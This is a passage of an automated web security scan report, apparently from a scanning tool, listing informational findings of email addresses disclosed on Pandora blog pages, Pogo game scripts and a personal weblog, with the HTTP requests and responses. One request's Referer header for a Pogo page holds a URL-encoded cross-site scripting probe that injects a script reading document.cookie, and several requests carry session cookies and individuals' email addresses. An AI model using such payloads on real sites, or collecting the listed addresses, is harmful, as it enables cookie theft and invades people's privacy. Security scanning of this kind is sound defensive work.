Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc56a-4d35-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 19765
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.41. http://blog.pandora.com/pandora/archives/massachusetts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/massachusetts/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:33 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc237-59ec-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 23020
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.42. http://blog.pandora.com/pandora/archives/michigan/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/michigan/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc4c1-51d1-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 20945
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.43. http://blog.pandora.com/pandora/archives/minnesota/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/minnesota/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:35 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:32 GMT
ETag: "7cc57f-42b7-49881a28a0500"
Accept-Ranges: bytes
Content-Length: 17079
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...

20.44. http://blog.pandora.com/pandora/archives/missouri/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/missouri/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:32 GMT
ETag: "7cc507-5072-49881a28a0500"
Accept-Ranges: bytes
Content-Length: 20594
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...

20.45. http://blog.pandora.com/pandora/archives/new-york/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/new-york/

Issue detail

The following email addresses were disclosed in the response:

timinny@pandora.com
tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:29 GMT
ETag: "410001-82b3-49881a25c3e40"
Accept-Ranges: bytes
Content-Length: 33459
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with "NEW YORK" in the subject line.</p>
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with SYRACUSE in the subject line.</p>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<strong>timinny@pandora.com</strong>
...[SNIP]...

20.46. http://blog.pandora.com/pandora/archives/north-carolina/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/north-carolina/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:27 GMT
ETag: "408001-48e2-49881a23db9c0"
Accept-Ranges: bytes
Content-Length: 18658
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
the various meetings and talks. I left town energized and armed with a bunch of great new ideas. I've posted some pix and thoughts below... if you have any you'd like me to add, please send 'em in - tour@pandora.com</p>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.47. http://blog.pandora.com/pandora/archives/ohio/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/ohio/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:47 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc4f6-501e-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 20510
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.48. http://blog.pandora.com/pandora/archives/oregon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/oregon/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:48 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:27 GMT
ETag: "7cc548-6ec7-49881a23db9c0"
Accept-Ranges: bytes
Content-Length: 28359
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...

20.49. http://blog.pandora.com/pandora/archives/pennsylvania/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/pennsylvania/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:49 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:31 GMT
ETag: "7cc3b0-5fee-49881a27ac2c0"
Accept-Ranges: bytes
Content-Length: 24558
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with "PHILADELPHIA" in the subject line.</p>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.50. http://blog.pandora.com/pandora/archives/rhode-island/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/rhode-island/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7ce1b3-439f-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 17311
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.51. http://blog.pandora.com/pandora/archives/roadtrip/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/roadtrip/

Issue detail

The following email addresses were disclosed in the response:

tim.westergren@pandora.com
tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:55:44 GMT
ETag: "7cc502-1a3e2-4990aa7655000"
Accept-Ranges: bytes
Content-Length: 107490
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<br />
RSVP: tour@pandora.com</p>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
the various meetings and talks. I left town energized and armed with a bunch of great new ideas. I've posted some pix and thoughts below... if you have any you'd like me to add, please send 'em in - tour@pandora.com</p>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<strong>tour@pandora.com</strong>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<strong>tim.westergren@pandora.com</strong>
...[SNIP]...
<strong>tim.westergren@pandora.com</strong>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.52. http://blog.pandora.com/pandora/archives/roadtrip/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/roadtrip/index.html

Issue detail

The following email addresses were disclosed in the response:

tim.westergren@pandora.com
tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:18 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:55:44 GMT
ETag: "7cc502-1a3e2-4990aa7655000"
Accept-Ranges: bytes
Content-Length: 107490
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<br />
RSVP: tour@pandora.com</p>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
the various meetings and talks. I left town energized and armed with a bunch of great new ideas. I've posted some pix and thoughts below... if you have any you'd like me to add, please send 'em in - tour@pandora.com</p>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<strong>tour@pandora.com</strong>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<strong>tim.westergren@pandora.com</strong>
...[SNIP]...
<strong>tim.westergren@pandora.com</strong>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.53. http://blog.pandora.com/pandora/archives/texas/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/texas/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:55 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT
ETag: "7cc3a8-8e62-49881a24cfc00"
Accept-Ranges: bytes
Content-Length: 36450
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with DALLAS in the subject line.</p>
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with AUSTIN in the subject line.</p>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.54. http://blog.pandora.com/pandora/archives/virginia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/virginia/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:04:58 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT
ETag: "7cc4df-5ed2-49881a24cfc00"
Accept-Ranges: bytes
Content-Length: 24274
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
the various meetings and talks. I left town energized and armed with a bunch of great new ideas. I've posted some pix and thoughts below... if you have any you'd like me to add, please send 'em in - tour@pandora.com</p>
...[SNIP]...
<strong>tour@pandora.com</strong>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.55. http://blog.pandora.com/pandora/archives/washington-dc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/washington-dc/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:28 GMT
ETag: "7ce1d4-4d1d-49881a24cfc00"
Accept-Ranges: bytes
Content-Length: 19741
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Please RSVP by sending an email to tour@pandora.com with DC in the subject line. Hope to see you there!</p>
...[SNIP]...

20.56. http://blog.pandora.com/pandora/archives/washington/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/washington/

Issue detail

The following email addresses were disclosed in the response:

tim.westergren@pandora.com
tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:27:30 GMT
ETag: "7cc584-52e1-49881a26b8080"
Accept-Ranges: bytes
Content-Length: 21217
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<strong>tim.westergren@pandora.com</strong>
...[SNIP]...

20.57. http://blog.pandora.com/pandora/index.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/index.xml

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/index.xml HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:45 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:55:55 GMT
ETag: "79e602-8883-4990aa80d28c0"
Accept-Ranges: bytes
Content-Length: 34947
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
<title>Pandora</title>
<link>http://blog.pandora.com/pandora/</link>
<description></description>
<language>en</language>
<copyright
...[SNIP]...
een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p>
...[SNIP]...
<p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p>
...[SNIP]...
<p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p>
...[SNIP]...
you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p>
...[SNIP]...
</strong>: Send email to tour@pandora.com with number of guests<br />
...[SNIP]...
</strong> Send email to tour@pandora.com with number of guests<br />
...[SNIP]...

20.58. http://blog.pandora.com/pandora/jquery.dimension.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/jquery.dimension.js

Issue detail

The following email address was disclosed in the response:

brandon.aaron@gmail.com

Request

GET /pandora/jquery.dimension.js HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:23:48 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 23 May 2007 04:44:32 GMT
ETag: "5cc023-25da-4311bd27b0c00"
Accept-Ranges: bytes
Content-Length: 9690
Content-Type: application/javascript

/*
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastChangedDate$
* $Rev$
*/
...[SNIP]...
the chain. If passed in the
* chain will not be broken and the result will be assigned to this object.
* @type Object
* @cat Plugins/Dimensions
* @author Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
*/
jQuery.fn.offset = function(options, returnObject) {
var x = 0, y = 0, elem = this[0], parent = this[0], sl = 0, st = 0, options = jQuery.extend({ margin: true, border
...[SNIP]...

20.59. http://board-games.pogo.com/v/ERWvfg/include/js/shared/markup2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/v/ERWvfg/include/js/shared/markup2.js

Issue detail

The following email address was disclosed in the response:

jsainz@ea.com

Request

GET /v/ERWvfg/include/js/shared/markup2.js HTTP/1.1
Host: board-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://board-games.pogo.com/games/monopoly?ade82%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E96953023051=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294537888307-New%7C1297129888307%3B; prod.JID=1750257D37B483E68CD1C5FD3B9D0CC1.000241; com.pogo.unid=6606248111925025

Response

HTTP/1.1 200 OK
Age: 137066
Date: Fri, 07 Jan 2011 13:24:35 GMT
Expires: Wed, 06 Jan 2016 13:24:36 GMT
Cache-Control: max-age=157680000
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"8152-1233362214000"
Last-Modified: Sat, 31 Jan 2009 00:36:54 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Server: Apache-Coyote/1.1
Content-Length: 8152

// copyright ea.com 2007

// This js allows the use of 'progressive enhancement' markup using class attributes rather than inline javascript.
// @see http://domscripting.com/presentations/xtech2006/

...[SNIP]...
<img src="path/to/image.gif" class="imgover" />
//    make sure your hover image is named image-over.gif
//    jsainz@ea.com 2007-03-02
Markup.imgOvers = function() {
   if (!document.getElementById) return

   var aPreLoad = new Array();
   var sTempSrc;

   var aInputs = document.getElementsByTagName("input");
   var aImg = docum
...[SNIP]...

20.60. http://card-games.pogo.com/v/ERWvfg/include/js/shared/markup2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://card-games.pogo.com
Path:	/v/ERWvfg/include/js/shared/markup2.js

Issue detail

The following email address was disclosed in the response:

jsainz@ea.com

Request

GET /v/ERWvfg/include/js/shared/markup2.js HTTP/1.1
Host: card-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://card-games.pogo.com/?sl=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294539198089-New%7C1297131198089%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=BC19526F2455BD28F04F73E408DC4DDB.000257; com.pogo.unid=6606467155258060

Response

HTTP/1.1 200 OK
Age: 137252
Date: Fri, 07 Jan 2011 13:24:34 GMT
Expires: Wed, 06 Jan 2016 13:24:35 GMT
Cache-Control: max-age=157680000
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"8152-1233362214000"
Last-Modified: Sat, 31 Jan 2009 00:36:54 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Server: Apache-Coyote/1.1
Content-Length: 8152

// copyright ea.com 2007

// This js allows the use of 'progressive enhancement' markup using class attributes rather than inline javascript.
// @see http://domscripting.com/presentations/xtech2006/

...[SNIP]...
<img src="path/to/image.gif" class="imgover" />
//    make sure your hover image is named image-over.gif
//    jsainz@ea.com 2007-03-02
Markup.imgOvers = function() {
   if (!document.getElementById) return

   var aPreLoad = new Array();
   var sTempSrc;

   var aInputs = document.getElementsByTagName("input");
   var aImg = docum
...[SNIP]...

20.61. http://dean.edwards.name/weblog/2006/06/again/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dean.edwards.name
Path:	/weblog/2006/06/again/

Issue detail

The following email addresses were disclosed in the response:

kevinl@directlogistics.com
lenatis@gmail.com

Request

GET /weblog/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:08:11 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Sun, 09 Jan 2011 02:08:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
